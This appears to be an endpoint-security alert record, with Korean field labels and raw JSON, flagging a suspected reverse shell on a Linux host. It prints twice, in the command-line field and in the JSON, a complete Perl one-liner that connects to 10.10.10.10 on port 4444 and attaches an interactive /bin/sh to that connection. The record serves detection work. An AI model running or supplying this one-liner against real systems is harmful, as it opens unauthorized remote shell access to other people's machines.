Alert Information
High
- Alert ID
ind:021368f9220b45cdb2760a069897c1c8:1766234825588234505-30103-1376528- Composite ID
84393bf974fd44bda943a25a6a7bc27f:ind:021368f9220b45cdb2760a069897c1c8:1766234825588234505-30103-1376528- 설명
- Bash has created an interactive terminal for a remote host. Check the process tree to determine if malicious commands were executed and if this access was expected.
- 호스트
- siemdev-14
- 상태
- new
- 생성 시간
- 2025-12-20 21:48:07
- 업데이트 시간
- 2025-12-20 22:47:07
MITRE ATT&CK
- Tactic
- Command and Control
- Technique
- Remote Access Tools
Command Line
bash -c perl -e "use Socket;\$i=\"10.10.10.10\";\$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));if(connect(S,sockaddr_in(\$p,inet_aton(\$i)))){open(STDIN,\">&S\");open(STDOUT,\">&S\");open(STDERR,\">&S\");exec(\"/bin/sh -i\");}"
Raw JSON Data
{"id":"ind:021368f9220b45cdb2760a069897c1c8:1766234825588234505-30103-1376528","composite_id":"84393bf974fd44bda943a25a6a7bc27f:ind:021368f9220b45cdb2760a069897c1c8:1766234825588234505-30103-1376528","agent_id":"021368f9220b45cdb2760a069897c1c8","cid":"84393bf974fd44bda943a25a6a7bc27f","description":"Bash has created an interactive terminal for a remote host. Check the process tree to determine if malicious commands were executed and if this access was expected.","severity":70,"severity_name":"High","confidence":80,"tactic":"Command and Control","tactic_id":"TA0011","technique":"Remote Access Tools","technique_id":"T1219","cmdline":"bash -c perl -e \u0022use Socket;\\$i=\\\u002210.10.10.10\\\u0022;\\$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname(\\\u0022tcp\\\u0022));if(connect(S,sockaddr_in(\\$p,inet_aton(\\$i)))){open(STDIN,\\\u0022\u003E\u0026S\\\u0022);open(STDOUT,\\\u0022\u003E\u0026S\\\u0022);open(STDERR,\\\u0022\u003E\u0026S\\\u0022);exec(\\\u0022/bin/sh -i\\\u0022);}\u0022","filename":"bash","filepath":"/usr/bin/bash","sha256":"a59fc4da19d169c175b247bfaf4a21c2ee7c16c3ed2820daa807ab12affe98fc","status":"new","type":"ldt","created_timestamp":"2025-12-20T12:48:07.884594128Z","updated_timestamp":"2025-12-20T13:47:07.902505747Z","device":{"device_id":"021368f9220b45cdb2760a069897c1c8","cid":"84393bf974fd44bda943a25a6a7bc27f","agent_version":"7.31.18410.0","hostname":"siemdev-14","local_ip":"172.17.0.1","external_ip":"211.198.135.5","mac_address":"16-bc-32-c0-b2-f4","platform_name":"Linux","os_version":"Rocky Linux 10.1"},"aggregate_id":"aggind:021368f9220b45cdb2760a069897c1c8:25817903425","CreatedAt":"2025-12-20T21:48:07.8845941+09:00","UpdatedAt":"2025-12-20T22:47:07.9025057+09:00"}
Quick Info
- Severity High
- Score 70
-
Agent ID
021368f9220b45cdb2760a069897c1c8
Actions